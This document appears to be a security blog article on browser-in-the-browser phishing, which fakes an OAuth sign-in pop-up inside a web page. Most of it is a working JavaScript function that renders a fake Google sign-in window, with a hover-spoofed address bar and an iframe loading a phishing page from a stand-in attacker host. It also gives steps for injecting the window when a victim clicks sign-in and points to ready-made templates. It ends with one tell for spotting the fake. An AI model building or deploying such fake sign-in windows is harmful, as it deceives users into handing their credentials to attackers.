For security professionals, the URL is usually the most trustworthy indicator of which site they are actually on. Attacks such as IDN homograph spoofing and DNS hijacking can reduce that trustworthiness, but they do not make URLs completely unreliable.
Quite often, when you sign in to a website with a Google, Microsoft or Apple account, a pop-up window appears asking you to authenticate. The image below shows the window that appears when you try to sign in to Canva with a Google account.
Replicating the design of this window with basic HTML/CSS is fairly simple. If you combine that design with an iframe that loads a phishing page from a malicious server, the result is almost indistinguishable from a real pop-up. The image below shows the fake window next to the real one; the differences between them are quite insignificant.
Custom URL on hover
If you add an onclick handler to the link that returns false, hovering over the link still shows the URL from the href attribute in the browser's status bar, but clicking the link does nothing because the href is ignored. This lets you give the pop-up window's address bar a more realistic look: it appears to point at the legitimate domain while never navigating anywhere.
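The following is an added example, not one of the original templates, that puts the two ideas above together: a fake window drawn with HTML/CSS, an address bar link whose href shows a plausible URL on hover but is neutralised by `onclick="return false"`, and an iframe that loads the actual phishing page. The function name, the theme colours and the sample URLs are assumptions chosen for illustration; in a real template the markup would be tuned pixel-by-pixel to the target browser.

```javascript
// Added example: renders a browser-in-the-browser style fake pop-up as an
// HTML string. Not the page's own template code; names and colours assumed.
const THEMES = {
  light: { chrome: "#ffffff", border: "#dadce0", text: "#202124", bar: "#f1f3f4" },
  dark:  { chrome: "#202124", border: "#3c4043", text: "#e8eaed", bar: "#303134" },
};

// Escape data before it is interpolated into HTML so a title or URL cannot
// break out of an attribute or text node.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the fake window. displayedUrl is what the victim sees in the fake
// address bar (and in the status bar on hover); frameSrc is where the
// credentials actually go.
function renderFakePopup({ title, displayedUrl, frameSrc, theme = "light", width = 500, height = 600 }) {
  const t = THEMES[theme];
  if (!t) throw new Error(`unknown theme: ${theme}`);
  const href = escapeHtml(displayedUrl);
  const titleBarHeight = 36;
  const addressBarHeight = 30;
  const frameHeight = height - titleBarHeight - addressBarHeight;
  return `
<div class="bitb" style="position:fixed;top:80px;left:50%;transform:translateX(-50%);width:${width}px;height:${height}px;background:${t.chrome};border:1px solid ${t.border};border-radius:8px;box-shadow:0 8px 32px rgba(0,0,0,.35);font-family:sans-serif;color:${t.text};overflow:hidden">
  <div class="bitb-title" style="display:flex;align-items:center;height:${titleBarHeight}px;padding:0 12px;background:${t.bar}">
    <span style="flex:1;font-size:13px">${escapeHtml(title)}</span>
    <span style="cursor:pointer">&#x2715;</span>
  </div>
  <div class="bitb-address" style="display:flex;align-items:center;height:${addressBarHeight}px;padding:0 12px;background:${t.bar};font-size:12px">
    <span style="margin-right:8px">&#x1F512;</span>
    <!-- hover shows the href in the status bar; the click goes nowhere -->
    <a href="${href}" onclick="return false" style="color:${t.text};text-decoration:none">${href}</a>
  </div>
  <!-- the real content: a phishing page served from the attacker's host -->
  <iframe src="${escapeHtml(frameSrc)}" title="${escapeHtml(title)}" style="width:100%;height:${frameHeight}px;border:0"></iframe>
</div>`.trim();
}

// Example usage with constructed, non-routable URLs.
const sampleHtml = renderFakePopup({
  title: "Sign in - Google Accounts",
  displayedUrl: "https://accounts.google.com/o/oauth2/auth",
  frameSrc: "https://phish.example.invalid/login.html",
  theme: "dark",
});
```

Inject the returned string into the landing page (for instance with `document.body.insertAdjacentHTML("beforeend", sampleHtml)`) when the victim clicks the "Sign in with Google" button. Title bar, address bar heights and fonts have to match the victim's real browser and theme, which is why separate templates per OS and browser are needed.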
Templates have been created for the following operating systems and browsers:
- Windows – Chrome (light and dark modes)
- Mac OSX – Chrome (light and dark modes)
Ready-made templates are available on GitHub.
This technique makes a phishing site considerably more convincing. Once on the fraudulent site, the user is unlikely to notice the deception, because the fake window's address bar displays an entirely plausible URL. An unsuspecting victim enters credentials into the pop-up window, and they are sent straight to the attacker. One tell remains: a genuine sign-in pop-up is a separate operating-system window and can be dragged outside the parent browser window, whereas the fake one is just page content and cannot leave the browser's viewport.